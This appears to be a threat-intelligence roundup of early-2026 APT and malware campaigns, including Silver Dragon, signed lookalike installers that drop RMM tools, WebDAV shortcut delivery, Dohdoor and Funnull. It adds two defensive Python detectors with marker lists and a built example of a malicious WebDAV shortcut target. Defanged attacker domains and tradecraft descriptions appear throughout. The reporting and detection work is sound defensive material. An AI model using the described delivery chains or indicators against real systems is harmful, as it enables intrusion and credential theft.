Multiple APT and malware campaigns abusing phishing, cloud services, and signed binaries
Reporting across multiple research teams described a surge of distinct, ongoing intrusion campaigns rather than a single unified incident. Check Point reported on Silver Dragon, a Chinese-aligned activity cluster assessed as operating under the broader APT41 umbrella, targeting organizations in Southeast Asia and Europe (notably government) via exploitation of public-facing servers and phishing, then deploying Cobalt Strike, DNS tunneling, and a new Google Drive–based backdoor (GearDoor) alongside custom tools (SSHcmd and SliverScreen) for remote access and screen capture. Microsoft detailed separate February 2026 phishing campaigns by an unknown actor that used meeting/invoice-style lures and EV code-signed malware (certificate issued to TrustConnect Software PTY LTD) masquerading as common workplace apps (e.g., msteams.exe, adobereader.exe, zoomworkspace.clientsetup.exe) to install legitimate RMM tooling (ScreenConnect, Tactical RMM, Mesh Agent) for persistent access and lateral movement.
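The signed-lookalike pattern above (a valid EV signature on a binary named like a workplace app, followed by an RMM install) is detectable by checking signer identity rather than signature validity. The following triage logic is an added example, not code from the page or from Microsoft; the expected-publisher strings, RMM marker substrings and the Sysmon-style event records are assumptions constructed for the example.

```python
import ntpath

# Lookalike file names from the reporting, mapped to the publisher expected in
# the Authenticode signer subject (expected values are assumptions for this example).
EXPECTED_SIGNER = {
    "msteams.exe": "microsoft corporation",
    "adobereader.exe": "adobe inc",
    "zoomworkspace.clientsetup.exe": "zoom video communications",
}
# Substrings identifying the RMM agents the campaign installed (assumed names).
RMM_MARKERS = ("screenconnect", "tactical", "meshagent")
# A legitimately installed copy of these apps would not run from these paths.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\downloads\\")

# Constructed process-creation events: image path, signer subject, child image.
EVENTS = [
    {"image": r"C:\Users\a\Downloads\msteams.exe",
     "signer": "TrustConnect Software PTY LTD",
     "child": r"C:\ProgramData\ScreenConnect.ClientSetup.exe"},
    {"image": r"C:\Program Files\Adobe\Acrobat\adobereader.exe",
     "signer": "Adobe Inc.", "child": ""},
    {"image": r"C:\Users\a\AppData\Local\Temp\zoomworkspace.clientsetup.exe",
     "signer": "TrustConnect Software PTY LTD",
     "child": r"C:\Program Files\TacticalAgent\tacticalagent.exe"},
    {"image": r"C:\Users\a\Downloads\setup.exe",
     "signer": "Unknown Publisher", "child": r"C:\Temp\meshagent.exe"},
]

def assess(event):
    """Return the list of findings for one process-creation event."""
    name = ntpath.basename(event["image"]).lower()
    signer = event.get("signer", "").lower()
    child = ntpath.basename(event.get("child", "")).lower()
    findings = []
    expected = EXPECTED_SIGNER.get(name)
    # A valid signature is not enough: the signer must be the expected vendor.
    if expected and expected not in signer:
        findings.append("lookalike name signed by unexpected publisher: " + event.get("signer", "<unsigned>"))
    if expected and any(d in event["image"].lower() for d in USER_WRITABLE):
        findings.append("workplace-app name running from user-writable path")
    if child and any(m in child for m in RMM_MARKERS):
        findings.append("spawns RMM agent installer: " + child)
    return findings

def triage(events):
    """Return (image, findings) for every event that produced a finding."""
    hits = []
    for e in events:
        f = assess(e)
        if f:
            hits.append((e["image"], f))
    return hits
```

The last constructed event shows that the RMM-spawn rule fires on its own, independent of the lookalike-name rule.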
Other reporting highlighted additional, unrelated campaigns and tradecraft: ClearSky described a Russian-aligned operation targeting Ukraine using a phishing-delivered ZIP/HTA chain that drops a .NET loader (BadPaw) and backdoor (MeowMeow) with .NET Reactor obfuscation, parameter-gated execution, and sandbox/tooling checks (with low-confidence linkage to APT28). Cofense-reported activity (via SC Media) showed phishing that weaponizes Windows File Explorer + WebDAV using URL/LNK shortcuts to pull payloads (notably AsyncRAT, XWorm, DcRAT) and infrastructure including Cloudflare Tunnel domains hosting WebDAV servers. Cisco Talos-reported Dohdoor activity (UAT-10027) targeted US education and healthcare, using PowerShell→batch→DLL sideloading via legitimate executables (e.g., Fondue.exe, mblctr.exe, ScreenClippingHost.exe) and DNS-over-HTTPS to Cloudflare for C2 discovery and tunneling. Separately, Zscaler reported ScarCruft’s Ruby Jumper campaign using Zoho WorkDrive for C2 and removable media components to reach air-gapped systems, while another Zscaler report analyzed Dust Specter targeting Iraqi government officials with password-protected RAR delivery and modular implants. Qianxin XLab assessed sanctioned infrastructure provider Funnull resurfacing to support scam/criminal supply chains and potential MacCMS-related supply-chain activity, and F5 Labs summarized APT42’s TAMECAT PowerShell backdoor focused on Edge/Chrome credential theft with C2 over Telegram/Discord/HTTPS and specific file/hash indicators. (A separate Help Net Security item on a Microsoft Defender onboarding tool is product/administrative news and not part of the threat-campaign reporting.)
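The WebDAV delivery chain mentioned above relies on a shortcut whose target makes Explorer reach an external WebDAV server. The scanner below is an added example, not code from the page or from Cofense: it parses `.url` shortcut text, extracts the host from UNC, `file://` and `http(s)` targets (including the Windows redirector's `host@SSL@443` form), and flags targets that leave an assumed internal-host allowlist or point at executable content. The sample shortcuts, the allowlist and the marker list are constructed assumptions; binary `.lnk` files are out of scope here.

```python
import configparser
from urllib.parse import urlparse

# Tokens the Windows WebDAV redirector uses in UNC/file targets.
WEBDAV_MARKERS = ("@ssl", "@443", "davwwwroot", "webdav")
# Hosts the organisation's file-share traffic is expected to reach (assumed allowlist).
INTERNAL_HOSTS = {"fileserver.corp.example"}
# Remote target types that execute rather than open as documents.
EXEC_EXT = {"lnk", "exe", "js", "vbs", "hta", "bat", "cmd", "ps1"}

# Constructed .url shortcut contents (203.0.113.5 is a documentation address).
MALICIOUS_URL = "[InternetShortcut]\nURL=file://203.0.113.5@SSL@443/DavWWWRoot/invoice/Rechnung.lnk\n"
BENIGN_URL = "[InternetShortcut]\nURL=https://intranet.corp.example/handbook\n"
INTERNAL_UNC = "[InternetShortcut]\nURL=\\\\fileserver.corp.example\\share\\report.docx\n"

def shortcut_target(text):
    """Return the URL= value of a .url shortcut, or None if it has none."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return cp.get("InternetShortcut", "URL", fallback=None)

def target_host(target):
    """Extract the host a shortcut target points at (UNC, file://, http(s))."""
    t = target.strip()
    if t.startswith("\\\\"):
        authority = t[2:].split("\\", 1)[0]
    else:
        p = urlparse(t)
        if p.scheme not in ("file", "http", "https"):
            return None
        authority = p.netloc
    # host@SSL@443 encodes TLS and port; the host is the part before the first '@'.
    return authority.split("@", 1)[0].lower() or None

def assess_shortcut(text):
    """Return findings for one .url shortcut; an empty list means nothing suspicious."""
    target = shortcut_target(text)
    if target is None:
        return []
    low = target.strip().lower()
    host = target_host(target)
    findings = []
    is_share = low.startswith("\\\\") or low.startswith("file:")
    if is_share and host and host not in INTERNAL_HOSTS:
        findings.append("remote file share outside allowlist: " + host)
    if any(m in low for m in WEBDAV_MARKERS):
        findings.append("WebDAV redirector syntax in target")
    ext = low.rsplit(".", 1)[-1]
    if ext in EXEC_EXT:
        findings.append("remote target is executable content: ." + ext)
    return findings
```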
Timeline
Mar 3, 2026
Check Point links Silver Dragon to the APT41 umbrella
Check Point Research published details on Silver Dragon, describing three infection chains, custom tools including GearDoor, SilverScreen, and SSHcmd, and persistent use of Cobalt Strike and DNS tunneling. The company assessed with high confidence that the cluster is linked to a Chinese-nexus actor under the APT41 umbrella.
Mar 3, 2026
ClearSky reveals BadPaw and MeowMeow campaign against Ukraine
ClearSky disclosed a phishing campaign targeting Ukraine that used a ZIP-delivered HTA lure to install the BadPaw loader and MeowMeow backdoor. The firm attributed the activity with high confidence to a Russian state-aligned actor and with low confidence to APT28.
Mar 2, 2026
Qianxin exposes Funnull's RingH23 and MacCMS attacks
Qianxin XLab reported that Funnull had resurfaced with the RingH23 server-side compromise framework and MacCMS supply-chain attacks. The report detailed compromise of GoEdge CDN management nodes, SSH-based lateral movement, rootkit and Nginx-module deployment, and large-scale malicious JavaScript redirection affecting mobile users.
Mar 2, 2026
Cisco Talos discloses Dohdoor malware campaign details
Reporting on March 2, 2026 described the ongoing Dohdoor campaign against U.S. schools and healthcare, including its anti-forensics, process hollowing, and Cloudflare DoH-based C2 techniques. Talos said attribution remained uncertain despite low-confidence overlaps with Lazarus Group tradecraft.
Mar 2, 2026
Zscaler publishes Dust Specter campaign targeting Iraqi officials
Zscaler ThreatLabz disclosed the Dust Specter APT campaign targeting government officials in Iraq using two related malware chains: SPLITDROP/TWINTASK/TWINTALK and GHOSTFORM. The campaign used password-protected archives, DLL sideloading, file-based inter-process tasking, and a Google Forms lure impersonating an Iraqi Ministry of Foreign Affairs survey.
Mar 2, 2026
F5 reports mass exploitation of Magento SessionReaper zero-day
F5 Labs reported that the Magento zero-day CVE-2025-54236, dubbed SessionReaper, was being mass-exploited and had compromised more than 200 stores. The bulletin also highlighted active exploitation of Ivanti EPMM zero-days and other critical flaws requiring urgent patching.
Feb 1, 2026
Microsoft observes signed malware phishing campaigns using workplace lures
In February 2026, Microsoft Defender Experts observed multiple phishing campaigns using meeting and document lures to deliver malware disguised as workplace software. The payloads were signed with an EV certificate issued to TrustConnect Software PTY LTD and deployed RMM tools including ScreenConnect, Tactical RMM, and MeshAgent.
Dec 1, 2025
ThreatLabz identifies ScarCruft's Ruby Jumper campaign
Zscaler ThreatLabz first identified the North Korea-linked Ruby Jumper campaign in December 2025. The operation used malicious LNK files, multiple malware families, Zoho WorkDrive-based C2, and removable media to bridge air-gapped environments.
Dec 1, 2025
Dohdoor campaign begins targeting U.S. schools and healthcare
Cisco Talos said a campaign attributed to UAT-10027 had been active since at least December 2025, primarily targeting U.S. education and healthcare organizations. The operation used phishing, DLL sideloading, and a new Windows backdoor called Dohdoor that relied on DNS-over-HTTPS for C2.
Jul 9, 2025
Funnull expands into MacCMS supply-chain poisoning
Researchers reported that Funnull poisoned the official update channel of the maccms.la edition of MacCMS/AppleCMS in 2025 to deliver PHP backdoors. The backdoors injected Funnull-style JavaScript loaders and redirectors using short-lived payload URLs to hinder forensics.
Jul 9, 2025
Funnull-linked RingH23 activity is first detected
Researchers detected a Linux ELF downloader from download.zhw[.]sh on July 9, 2025, marking the start of observed RingH23 activity attributed to Funnull. Infrastructure such as client.110[.]nz also showed unusually high DNS resolution volume.
Jun 1, 2025
Suspicious CDN1.AI infrastructure is created
Researchers reported that CDN1.AI, a suspicious infrastructure layer later assessed as possibly Funnull-controlled, was created in June 2025. It was later linked to migration of malicious JavaScript hosting used in redirection activity.
May 29, 2025
OFAC sanctions Funnull Technology Inc. and Fangneng CDN
The U.S. Treasury's OFAC sanctioned Funnull Technology Inc. and Fangneng CDN for their role in enabling large-scale pig-butchering scams and related infrastructure abuse. The sanctions became a key reference point in later reporting on Funnull's re-emergence.
Sep 1, 2024
WebDAV malware campaigns escalate sharply
Cofense reported a notable escalation in the WebDAV abuse campaigns in September 2024, with phishing emails—often German-language fake invoices—targeting European corporate networks. Malicious infrastructure included Cloudflare Tunnel domains hosting WebDAV servers.
Jun 15, 2024
Silver Dragon activity starts targeting Europe and Southeast Asia
Check Point assessed the Chinese-aligned Silver Dragon cluster had been active since at least mid-2024 against organizations in Southeast Asia and Europe, especially government entities. The group used exploitation of public-facing servers and phishing to deliver Cobalt Strike and custom tooling.
May 1, 2024
Funnull-linked GoEdge poisoning incidents occur
May 2024 GoEdge poisoning incidents were later cited as sharing strong code and tradecraft overlap with the RingH23 and JavaScript injection activity attributed to Funnull. These earlier incidents helped support the later attribution assessment.
Feb 1, 2024
Polyfill.io supply-chain attack later tied to Funnull-style JS
A February 2024 Polyfill.io supply-chain attack used JavaScript later assessed as nearly identical to code seen in Funnull-linked operations. This similarity was cited as part of later attribution to Funnull.
Feb 1, 2024
WebDAV-based malware delivery campaigns begin
Campaigns abusing Windows File Explorer and the WebDAV protocol to deliver malware such as AsyncRAT, XWorm RAT, and DcRAT were active by February 2024. The attacks used direct links, URL shortcut files, and LNK files to trigger remote WebDAV access from phishing lures.
Related Stories
Stealthy Malware Campaigns Abuse Windows and Office Features for Initial Access and Evasion
Multiple early-2026 campaigns highlight increasingly **low-noise initial access** and **living-off-the-land** execution on Windows endpoints. CyStack reported activity attributed to **APT-Q-27 (GoldenEyeDog)** targeting financial institutions via a corporate support workflow: a user clicked a malicious link delivered through a **Zendesk ticket**, leading to download of an executable masquerading as an image/`.pif` file (aided by Windows’ hidden-extension defaults). The malware was signed with a **revoked certificate** that still appeared trusted due to a valid timestamp, and its modular backdoor/C2 infrastructure overlapped with prior APT-Q-27 activity, enabling stealthy persistence and control without triggering common endpoint alerts. Separately, Securonix described the **Dead#Vax** multistage campaign using phishing links to **VHD files hosted on IPFS**, where mounting/opening the VHD triggers **Windows Script Files**, obfuscated batch, and **PowerShell** loaders to support encrypted data theft and conceal execution logic, culminating in **AsyncRAT** deployment for credential theft, surveillance, and follow-on intrusion. In another targeted operation, Zscaler ThreatLabz linked **Operation Neusploit** to **APT28**, exploiting **CVE-2026-21509** (Microsoft Office/365 **OLE** bypass) via crafted **RTF** documents to drop payloads including **MiniDoor** (Outlook-focused collection and mailbox manipulation, including exfiltration to attacker-controlled email accounts) and **PixyNetLoader** (reported to use steganography). A separate “ThreatsDay” bulletin is a multi-story roundup and does not provide additional, specific corroboration on these same campaigns beyond mentioning adjacent themes (e.g., AsyncRAT/C2) in a broader news digest.
3 weeks ago
Mixed threat reporting: APT campaigns, malware delivery via compromised web assets, and ransomware exploitation
The provided items do not describe a single cohesive cybersecurity event; they span multiple unrelated threat reports and opinion pieces. Notable incident-level reporting includes **APT28** activity in Western/Central Europe (“Operation MacroMaze”) using spear-phishing lures with Office macros that beacon via `INCLUDEPICTURE` to `webhook[.]site` and then execute VBScript/CMD/batch stages for persistence and follow-on payload delivery. Separately, **MuddyWater** (Iran/MOIS-linked) was reported running “Operation Olalampo” against organizations in the Middle East and Africa, delivering new custom malware (including a **Char** backdoor using a **Telegram bot** for C2) and, in some cases, attempting exploitation of public-facing servers in addition to phishing. Criminal activity and initial-access tradecraft were also covered across distinct stories: a DFIR case study described exploitation of **Apache ActiveMQ** `CVE-2023-46604` to gain RCE, conduct post-exploitation (Metasploit/Meterpreter, privilege escalation, LSASS access, lateral movement), and ultimately deploy **LockBit**-branded ransomware via RDP using previously stolen credentials (with indications the payload was built using the leaked builder and used *Session* for communications). Multiple reports described malware delivery via compromised web assets and social engineering, including **GrayCharlie** injecting malicious JavaScript into WordPress sites to push **NetSupport RAT**, **Stealc**, and **SectopRAT** via fake updates/ClickFix-style CAPTCHAs, and a separate **ClickFix** campaign delivering a custom C++ RAT (**MIMICRAT**) through fake Cloudflare verification prompts that trick users into running PowerShell. 
Additional, unrelated threat reporting included a **NuGet** supply-chain attack (typosquatted `NCryptYo` plus companion packages) targeting ASP.NET Identity data and enabling backdoored authorization rules, and malicious Chrome extensions using a “**Promise Bomb**” browser-crash technique to drive users to run fake “CrashFix” PowerShell steps. Several other items were generic commentary/roundups (data breach trends, quantum preparedness, Enigma history, NATO public opinion polling, recon how-to, and a malware-newsletter link list) and do not add event-specific intelligence.
1 month ago
Multiple Malware Campaigns Abuse Phishing and Legitimate Cloud Services to Compromise Windows and Linux Systems
Reporting describes several unrelated but contemporaneous malware operations targeting both Windows and Linux environments. In Taiwan, FortiGuard Labs observed targeted phishing using tax and e-invoice lures to deliver **Winos 4.0 (ValleyRat)** and plugins, with delivery chains including malicious `.LNK` files, **DLL sideloading**, and **BYOVD** using the vulnerable driver `wsftprm.sys`, supported by rapidly rotating domains and cloud-hosted infrastructure that reduces the effectiveness of static blocklists. Separately, Cato CTRL reported a new Windows loader, **Foxveil**, that stages and retrieves shellcode via trusted platforms (**Cloudflare Pages**, **Netlify**, and **Discord attachments**) and executes payloads using techniques including **Early Bird APC injection** (often into a fake `svchost.exe`) or self-injection, while persisting via Windows services or masqueraded binaries dropped into `SysWOW64`. Additional reporting covers distinct campaigns in other regions and platforms. A LATAM-focused intrusion chain uses fake bank receipt lures (double-extension such as `.pdf.js`) to deliver **XWorm v5.6**, employing oversized/obfuscated JavaScript, WMI-based process creation (`Win32_Process`) to launch hidden PowerShell, and abuse of a hardcoded **Cloudinary** URL for staging—capabilities consistent with credential theft and enabling follow-on ransomware. Trellix analysis described a separate **Monero** cryptomining operation distributed via pirated software installers that propagates through **USB/external drives** to reach even air-gapped systems, using multi-component “watchdog” self-healing behavior and aggressive defense-evasion. On Linux, LevelBlue detailed a new **SysUpdate** variant (packed `ELF64`) that performs host reconnaissance and uses strong C2 encryption; researchers built a **Unicorn Engine**-based emulation tool to reproduce key generation/encryption routines and decrypt captured C2 traffic for investigation and detection engineering.
1 month ago